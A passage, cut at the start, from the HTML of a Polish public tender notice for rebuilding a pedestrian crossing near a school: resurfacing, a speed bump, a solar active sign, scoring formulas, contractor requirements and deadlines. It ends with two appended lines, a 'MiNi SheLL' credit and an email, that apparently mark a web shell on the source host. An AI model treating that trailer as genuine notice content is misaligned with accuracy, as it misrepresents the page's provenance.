przy szkole.<br/> Celem opracowania jest zapewnienie poprawy warunków panujących na <br/> przejściach dla wszystkich uczestników ruchu, zarówno pieszych, rowerzystów <br/> jak i kierowców poruszających się drogą.<br/> W ramach inwestycji przewidziano:<br/> - frezowanie nawierzchni drogi oraz ułożenie nowej warstwy ścieralnej betonu <br/> asfaltowego o gr. 4,0 cm<br/> - montaż progu zwalniającego – nawierzchnia progu z kostki brukowej betonowej, fazowej, czerwonej - montaż przejścia aktywnego na wysięgniku (L=5,5) z lampą dwustronną φ300 panelem znaku D-6 dwustronnie podświetlanym 900*900 mm oraz doświetleniem przejścia dla pieszych: <br/> podstawowe wyposażenie znaku aktywnego:<br/>a) znak aktywny – podświetlany D-6;<br/>b) czujnik ruchu;<br/>c) sterownik;<br/>d) panel fotowoltaiczny;<br/>e) skrzynka do zasilania solarnego z akumulatorem 200 Ah;<br/>f) elementy mocowania;<br/>g) wysięgnik z fundamentem prefabrykowanym, sugerowana wysokość wysięgnika 5,0 m<br/>Parametry fizyczne:<br/>a)	Całkowite wymiary - 960x960x120 mm<br/>b)	Waga - 30 kg<br/>c)	Lico - podświetlane<br/>d)	Warunki środowiskowe (klasa odporności) - IP – 67 (od lica znaku)<br/>e)	Obudowa - aluminium<br/>f)	Mocowanie - chwytak regulowany boczny<br/>Parametry elektryczne:<br/>a)	Napięcie zasilania - 12 V<br/>b)	Średni pobór mocy - 15 W<br/>c)	Średnica pulsatora LED - 300 mm<br/>d)	Kolor diod LED pulsatora - Żółty<br/>e)	Moc oprawy doświetlającej przejście - 48 W<br/>f)	Kolor diod LED oprawy - Biały neutralny (5500K)<br/>g)	Czas autonomii(dla zasilania solarnego) - Minimum 7 dni<br/>- demontaż istniejącej bariery drogowej oraz usadowienie barier u-12a<br/>- przygotowanie podbudowy pod chodnik, rozebranie istniejącej kostki chodnikowej oraz obrzeży betonowych. Przebudowa chodnika oraz montaż płytek ostrzegawczych 30x30x8, płytek pasa ostrzegawczego 30x30x8 po obydwu stronach przejścia.<br/>Szczegółowo przedmiot zamówienia opisują ogólne specyfikacje techniczne oraz przedmiary robót oraz plany sytuacyjne. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45112000-5 - Roboty w zakresie usuwania gleby</p> <p class="mb-0">45233140-2 - Roboty drogowe</p> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">100 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Cena (C) 60 pkt.<br/>2 Gwarancja (G) 40 pkt.<br/>Oferta po uwzględnieniu wag może uzyskać maksymalną ilość punktów tj. 100 pkt.:<br/>za najniższą cenę – 60 pkt.<br/>za najdłuższy okres gwarancji – 40 pkt.<br/>W kryterium „cena” ocena ofert zostanie dokonana przy zastosowaniu wzoru:<br/>C= C_min/C_n *60 pkt.<br/>Gdzie:<br/>C – ilość punktów dla badanej oferty<br/>Cmin – najniższa cena brutto<br/>Cn – cena badanej oferty brutto<br/>Oferta o najniższej cenie brutto uzyska maksymalną ilość punktów – 60 pkt. Pozostałe ceny obliczane dla badanych ofert zostaną<br/>porównane z ofertą o najkorzystniejszej (najniższej) cenie brutto oferty. Sumę oceny tego kryterium stanowić będzie liczba<br/>uzyskanych punktów pomnożona przez współczynnik odpowiadający wadze kryterium „cena”. Uzyskana liczba punktów w ramach<br/>kryterium zaokrąglona będzie do drugiego miejsca po przecinku.<br/>W kryterium „okres gwarancji” ocena ofert zostanie dokonana przy zastosowaniu wzoru:<br/>Gwarancja= G_b/G_max *40 pkt<br/>Gdzie:<br/>G – ilość punktów przyznana w ofercie kryterium „ okres gwarancji”<br/>Gb – termin gwarancji w badanej ofercie<br/>Gmax – najdłuższy zaoferowany okres gwarancji spośród badanych ofert<br/>UWAGA! Okres gwarancji należy podać w miesiącach w formularzu ofertowym (załącznik nr 1 do SWZ).<br/>Zamawiający wymaga minimum 36-miesięcznego okresu gwarancji (3 lata). W przypadku podania przez Wykonawcę krótszego niż<br/>wymagany okres gwarancji lub niepodanie (wpisanie) terminu gwarancji, oferta Wykonawcy zostanie odrzucona jako niezgodną z<br/>SWZ. Maksymalną ilość punktów otrzyma wykonawca, który zaoferuje, co najmniej 60 miesięczny okres gwarancji. Jeżeli<br/>Wykonawca zaoferuje okres gwarancji dłuższy niż 60 miesięcy (5 lat) do oceny ofert zostanie przyjęty okres 60 miesięcy<br/>i taki zostanie uwzględniony także w umowie. Wykonawca, który zaoferuje najkorzystniejszy okres (60 miesięcy) otrzymuje<br/>maksymalną liczbę punktów w ramach kryterium „okres gwarancji”.<br/>Łączna liczba punktów zostanie obliczona, jako suma uzyskanych punktów w ww. kryteriach zgodnie z poniższym wzorem:<br/>P = C + G<br/>Gdzie:<br/>P – łączna liczba punktów uzyskanych w kryteriach<br/>C – liczba punktów przyznana danej ofercie w kryterium „cena”<br/>G – liczba punktów przyznana danej ofercie w kryterium „okres gwarancji”<br/>Punktacja przyznawana ofertom w kryteriach oceny ofert „Cena” i „Gwarancja” będzie liczona z dokładnością do dwóch miejsc po<br/>przecinku, zgodnie z zasadami arytmetyki.<br/>W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym<br/>zaoferowanej ceny.<br/>Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie. <br/>3)	sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia warunku w powyższym zakresie. <br/>4)	zdolności technicznej lub zawodowej:<br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że: <br/>a)	wykonał nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 robotę budowlaną odpowiadające swoim rodzajem i wartością:<br/>i.	dla części I: budowa lub przebudowa dróg obejmująca prace brukowe i układaniu nawierzchni asfaltowych o wartości robót co najmniej 150 000,00 zł brutto.,<br/>dla części II: budowa lub przebudowa dróg obejmująca prace polegające na układaniu nawierzchni asfaltowych oraz oczyszczeniu i odmuleniu istniejącego rowu o wartości robót co najmniej <br/>70 000,00 zł brutto, <br/>ii.	dla części III: budowa lub przebudowa dróg obejmująca prace brukowe i układaniu nawierzchni asfaltowych o wartości robót co najmniej 80 000,00 zł brutto.<br/> <br/>b)	dysponuje osobami odpowiedzialnymi za kierowanie robotami budowlanymi – dla Części I, II oraz III zamówienia: Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub że będzie dysponował zarówno na etapie udzielenia zamówienia jak i w czasie jego realizacji co najmniej jedną osobą posiadającą uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie, określone przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz.U z 2025 r. poz. 418) lub odpowiadające im ważne uprawnienia budowlane w tym również wydane w trybie uznawania klasyfikacji zawodowych cudzoziemców oraz w rozporządzeniu Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2019 r. poz. 831) lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie uprzednio obowiązujących przepisów prawa, lub uznane przez właściwy organ, zgodnie z ustawą z dnia 22 grudnia 2015r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U z 2023 r. poz. 334) do pełnienia samodzielnej funkcji w budownictwie tj. osobą, która będzie uczestniczyć w wykonywaniu zamówienia (kierownik robót) musi posiadać uprawnienia budowlane do pełnienia samodzielnych funkcji w budownictwie w specjalności inżynieryjnej drogowej bez ograniczeń lub w ograniczonym zakresie w specjalnościach konstrukcyjno-budowlanych w branży drogowej lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów prawa, a także wskaże podstawę do dysponowania tymi osobami. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1)	oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, <br/>o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (t.j. Dz. U. z 2024 r. poz. 1616), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej zgodnie z załącznikiem nr 3 do SWZ;<br/>2)	odpis lub informację z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)	wykaz robót budowlanych porównywalnych z robotami budowlanymi stanowiącymi przedmiot zamówienia spełniających wymagania określone w rozdz. VI ust. 2 pkt 4 lit. a SWZ, wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, wraz z załączeniem dowodów określają czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy te roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – inne dokumenty– oświadczenie wykonawcy, zgodnie z załącznikiem nr 4 do SWZ;<br/>2)	wykaz osób skierowanych przez wykonawcę do realizacji zamówienia publicznego, spełniających wymagania określone w rozdz. VI ust. 2 pkt. 4 lit. b SWZ wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami zgodnie z załącznikiem nr 5 do SWZ;</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. <br/>2.	W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w rozdz. VIII ust. 1 SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy <br/>z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy.<br/>4.	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia <br/>z postępowania składa każdy z Wykonawców wspólnie ubiegających się <br/>o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający zawiera umowę w sprawie zamówienia publicznego <br/>w terminie nie krótszym niż 5 dni od dnia przesłania zawiadomienia <br/>o wyborze najkorzystniejszej oferty.<br/>2.	Zamawiający może zawrzeć umowę w sprawie zamówienia publicznego przed upływem terminu, o którym mowa w ust. 1, jeżeli postępowaniu <br/>o udzielenie zamówienia prowadzonym w trybie podstawowym złożono tylko jedną ofertę.<br/>3.	W przypadku wyboru, jako oferty najkorzystniejszej, oferty wykonawców wspólnie ubiegających się o udzielenie zamówienia, należy przed podpisaniem umowy o zamówienie publiczne przedłożyć Zamawiającemu kopię umowy regulującej współpracę tych wykonawców. <br/>4.	Zaleca się, aby umowa konsorcjum regulująca współpracę wykonawców wspólnie ubiegających się o udzielenie zamówienia w szczególności zawierała postanowienia wynikające z charakteru konsorcjum:<br/>1)	określenie stron umowy z oznaczeniem lidera konsorcjum,<br/>2)	cel zawarcia umowy,<br/>3)	czas trwania konsorcjum (obejmujący okres realizacji przedmiotu zamówienia, gwarancji i rękojmi),<br/>4)	zapis o solidarnej odpowiedzialności każdego członka konsorcjum wobec Zamawiającego za wykonanie umowy,<br/>5)	wyłączenie możliwości wypowiedzenia umowy konsorcjum przez któregokolwiek z jego członków do czasu wykonania przedmiotu zamówienia.<br/>5.	Jeżeli wykonawca, którego oferta została wybrana, uchyla się od zawarcia umowy w sprawie zamówienia publicznego, Zamawiający wybiera ofertę najkorzystniejszą spośród pozostałych ofert, bez przeprowadzania ich ponownej oceny, chyba, że zachodzą przesłanki, o których mowa w art. 255 ustawy Pzp.<br/>6.	Wykonawca będzie zobowiązany do podpisania umowy w miejscu <br/>i terminie wskazanym przez Zamawiającego. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-08-06 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/powiat_gostyn</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-08-06 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-09-04</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com